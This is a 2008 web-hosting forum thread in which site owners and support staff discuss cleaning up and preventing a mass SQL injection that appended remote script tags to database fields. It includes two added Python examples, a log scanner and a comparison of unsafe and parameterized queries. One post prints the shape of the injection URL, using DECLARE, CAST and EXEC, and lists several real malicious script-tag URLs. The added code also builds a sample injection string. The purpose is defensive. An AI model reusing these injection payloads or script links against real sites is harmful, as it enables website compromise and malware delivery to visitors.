Recovering from SQL inject hack

Discussion in 'Database Support' started by Sailor, May 19, 2008.

  1. Sailor

    Sailor Perch

    Wondering if anyone can help me with removing some junk inserted into my tables by a SQL injection hack. They somehow managed to append the text '<script src=http://www.banner82.com/b.js></script>' to several of my text fields. Where the fields were previously empty it's easy to remove, but what SQL command can I use to remove it from the end of fields without losing the rest of the field contents?

    Thanks
  2. Stephen

    Stephen US Operations Staff Member

    Requesting a restore is the best way, as it most likely overwrote real data.

    Also check your HTTP logs for "NVARCHAR"; it will tell you the vulnerable pages, and unless you fix it, it WILL KEEP happening over and over.
  3. Sailor

    Sailor Perch

    Already requested info on the restore option. I first need to know how far back the restore point will be.

    Checking logs now. I don't see any instances of "NVARCHAR" - anything else I should be searching for?
  4. Stephen

    Stephen US Operations Staff Member

    No, NVARCHAR is in it in all cases I have seen; another may be to look for CAST.

    however send me a domain and I will find it for you in a matter of seconds :)
  5. Stephen

    Stephen US Operations Staff Member

    It seems to have morphed into a harder to find injection now :(
  6. Stephen

    Stephen US Operations Staff Member

    Found the new keyword to search for (just basic SQL statements, really, put into a path): look for VARCHAR or DECLARE.
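The log search Stephen describes in posts 2 to 6, as an added example (not code from the thread or from JodoHost): it URL-decodes the query string of each IIS W3C log line, flags the keywords he names, and decodes the hex inside CAST(0x... AS VARCHAR) so the operator can see what statement was actually sent. The field order, the log lines and the hex payload are constructed.

```python
import re
from urllib.parse import unquote_plus

# Keywords from the thread (NVARCHAR, VARCHAR, DECLARE, CAST), matched case-insensitively
# after URL-decoding, because the injected T-SQL usually arrives percent-encoded.
KEYWORDS = ("nvarchar", "varchar", "declare", "cast(", "exec(")
# The CAST(0x... AS VARCHAR) idiom hides the real statements as a hex string.
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\)?\s+AS\s+N?VARCHAR", re.IGNORECASE)


def decode_hex_payload(query):
    """Return the T-SQL hidden inside CAST(0x... AS VARCHAR), or None if there is none."""
    m = HEX_CAST.search(query)
    if not m:
        return None
    return bytes.fromhex(m.group(1)).decode("latin-1", errors="replace")


def scan_iis_log(lines):
    """Return (client_ip, page, keywords_found, decoded_payload) for suspicious requests.
    Assumed W3C field order (constructed; a real log states it in its #Fields line):
    date time c-ip cs-method cs-uri-stem cs-uri-query."""
    hits = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            continue
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, stem, query = fields[2], fields[4], fields[5]
        decoded = unquote_plus(query)
        found = [k for k in KEYWORDS if k in decoded.lower()]
        if found:
            hits.append((ip, stem, found, decode_hex_payload(decoded)))
    return hits


# Constructed sample log: one normal lookup and one request in the shape shetty's post shows.
# The hex string decodes to a harmless "DECLARE @T VARCHAR(255)" placeholder.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query
2008-05-19 10:00:01 203.0.113.7 GET /customer_lookup.asp email=alice@example.invalid
2008-05-19 10:00:02 198.51.100.9 GET /customer_lookup.asp email=a@b.invalid;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C41524520405420564152434841522832353529%20AS%20VARCHAR(4000));EXEC(@S);
"""

if __name__ == "__main__":
    for ip, page, found, payload in scan_iis_log(SAMPLE_LOG.splitlines()):
        print(f"{ip} hit {page}: keywords={found} decoded={payload!r}")
```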
  7. Sailor

    Sailor Perch

    Stephen,
    Thanks - you found the page. Since this particular page should only ever have a 4-digit number as the query, my quick fix is to filter that, but I'll also rewrite the page to do some more complete filtering.

    Thanks
  8. kujo2123

    kujo2123 Perch

    Quick question, are these SQL injection attacks limited to ASP pages? Or are other languages able to be attacked (like ColdFusion)?
  9. Stephen

    Stephen US Operations Staff Member

    It seems mostly like ASP/ASP.NET but ANYTHING is possible if it allows direct SQL code in a search box, etc.
  10. zaboss

    zaboss Perch

    Had a similar attack and the support showed me that they actually use the POST command and URL injection, so, the first thing to do was to deny any POST request in pages (I already have a function that checks every user input in pages for SQL injection).
  11. Stephen

    Stephen US Operations Staff Member

    Well, POST is a very valid request as well; to submit a search you need to POST, etc. :)
  12. mohmedsh

    mohmedsh Guppy

    I have the same problem too and I am still trying to recover the database, for 6 days now.
    The problem is that my ASP pages are many and the attacker runs a script about 200 times every day against my pages. That makes recovering useless, as he will attack again.
  13. Stephen

    Stephen US Operations Staff Member

    :(

    Here is what you need to do then.

    1. get logs from us if you do not have them, for what pages need fixing
    2. save a copy of the DB that is good, or have us save it; ask in a ticket to pull it out of rotation for saving
    3. fix the injection pages
    4. restore the DB AFTER fixing.
  14. mohmedsh

    mohmedsh Guppy

    Thanks Stephen, I have done all that and I have uploaded a cleaned backup database and opened a ticket to restore.
    The problem is that I am not able to bring the site live until I have about 500 pages fixed, which is not an option.
    Just as a workaround, I have created a new database user with permission set to only read the database. I am using that user to get the site online for visitors to view content, but no one can update, insert or delete anything.
    Now I am working on a fast fix in the DB connection page to make sure no injection can pass to the database.
  15. shetty

    shetty Guppy

    Denying POST will not completely help. SQL injection can also be done using a GET request as well.

    The complete fix is to convert all the query construction script to stored procs instead of doing it inside ASP pages. Stored procs need only execute permission to run. Deny write access to all tables. This will be costly sometimes, as many web applications are not designed this way.


    My sites also had SQL injections since April 08. I’ve investigated it. Here is how it works.


    For example...

    You have an ASP file customer_lookup.asp with the following script in it..

    "SELECT * FROM customer_table WHERE cust_email='" & Request.QueryString("email") & "'"

    Where you are constructing the SQL script by appending part of the URL query string value EMAIL.

    The page will typically be called as http://www.mydomain.com/customer_lookup.asp?email="[email protected]"

    Now the attacker can call the same page this way...

    "http://www.mydomain.com/[email protected];DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415....) AS VARCHAR(4000));EXEC(@S);"


    Now the actual script inside customer_lookup.asp will be

    "SELECT * from customer_table WHERE [email protected];DECLARE @S VARCHAR(4000);SET @S=CAST(0x4445434C415....) AS VARCHAR(4000));EXEC(@S);"

    As you can see, the semicolon (";") is a separator for SQL commands, so the page will execute the injected SQL commands.

    If the DB user account you use with IIS has full rights on the database, then the script can drop tables, query tables and delete/modify other database objects.

    Here are some of the injections to my tables… As you can see, all are from the “.cn” domain (Chinese).
    <script src=http://www.heihei117.cn/k.js>
    <script src=http://www.wowgm1.cn/m.js></script>
    <script src=http://www.killwow1.cn/g.js></script>
    <script src=http://www.caocaowow.cn/ip.js></script>
    <script src=http://www.kisswow.com.cn/m.js></script>
    <script src=http://www.wowyeye.cn/m.js></script>
    <script src=http://www.heihei117.cn.js></script>


    Another way to solve this problem is for JODOHOST to block all TCP requests coming from China at the firewall.
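The concatenation shetty walks through above beside its parameterized form, plus the REPLACE cleanup Sailor asks about in the first post; this is an added example in Python with sqlite3 standing in for SQL Server, not code from the thread. executescript() is used to mimic a server that accepts ';'-separated batches; the table, rows, e-mails and tag are constructed.

```python
import sqlite3

# Constructed placeholder tag in the shape the thread describes (not one of the real domains).
TAG = "<script src=http://www.example.invalid/b.js></script>"


def make_db():
    """In-memory stand-in for the poster's customer_table; rows are constructed sample data."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE customer_table (cust_email TEXT, note TEXT);"
        "INSERT INTO customer_table VALUES ('alice@example.invalid', 'regular customer');"
        "INSERT INTO customer_table VALUES ('bob@example.invalid', '');"
    )
    return con


def lookup_unsafe(con, email):
    """The customer_lookup.asp pattern: the query-string value is glued into the SQL text.
    executescript() stands in for a server that runs ';'-separated batches, as SQL Server does."""
    sql = "SELECT * FROM customer_table WHERE cust_email='" + email + "'"
    con.executescript(sql)


def lookup_safe(con, email):
    """Parameterized form: the value is sent separately from the SQL, so quotes and ';' stay data."""
    return con.execute("SELECT note FROM customer_table WHERE cust_email=?", (email,)).fetchall()


def notes(con):
    return [row[0] for row in con.execute("SELECT note FROM customer_table ORDER BY cust_email")]


def strip_appended_tag(con, tag=TAG):
    """Cleanup for fields the tag was appended to: REPLACE removes the tag and keeps the rest
    of the field (T-SQL has the same REPLACE function). Returns the number of rows cleaned."""
    cur = con.execute(
        "UPDATE customer_table SET note=REPLACE(note, ?, '') WHERE note LIKE ?",
        (tag, "%" + tag + "%"),
    )
    return cur.rowcount


# Constructed input in the shape the thread shows: close the quote, ';', then an extra statement.
INJECTED = "x';UPDATE customer_table SET note=note||'" + TAG + "';--"

if __name__ == "__main__":
    con = make_db()
    print("safe lookup returns:", lookup_safe(con, INJECTED))  # [] : treated as one odd e-mail
    lookup_unsafe(con, INJECTED)
    print("after unsafe lookup:", notes(con))                  # every note now ends with TAG
    print("rows cleaned:", strip_appended_tag(con), notes(con))
```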
  16. mohmedsh

    mohmedsh Guppy

    Thanks shetty for your post.
    First of all, JodoHost cannot do anything in our case, as the script is running through our code. The idea of blocking Chinese IPs is not valid, as when I investigated the problem I found that it is a Trojan that is used to attack, and this Trojan is attacking from several countries.
    For my problem I did a small fix until I rewrite my code. The idea is to use the database connection file that is included in all pages.
    1- I have added On Error Resume Next in that include page so the attacker cannot get the error showing useful information that he can use.
    2- I have created a user in the database that has permission only to read; that user is assigned to the not-logged-in session, so the script cannot take action unless the user logs in to my site.
    3- I have created a script in that include file to check all the data posted, and if it includes any of the known attack variables I redirect to an empty page.
    I hope that can help.
  17. Stephen

    Stephen US Operations Staff Member

    Yes, that is correct; there is a Trojan on client PCs all over the world, it is not just Chinese.

    In my research I have seen mostly China, but many also from the US some from numerous European countries, and some from South Korea.

    We'd have quite a mess if they tried to block all of these countries as we'd effectively block off much of the world. As you said it can happen in a GET and a POST so limiting the verbs is not a good fix, the best fix is sanitizing all the code of such unwanted data.
  18. aolee

    aolee Guppy

    Is this really caused by a Trojan, or a manual SQL inject? I also had the same problem. How do I shield my system from this kind of attack? Please help. Thanks!
  19. Stephen

    Stephen US Operations Staff Member

    There are simply too many SQL injection attempts for it to be manually done.
  20. aolee

    aolee Guppy

    What if you have a program that directly gets the whole URL address and compares it to the DB? How can I filter such an injection if it is injected via the browser? I cannot do whitelist and blacklist filtering, nor base it on char length, because my URLs are dynamic.
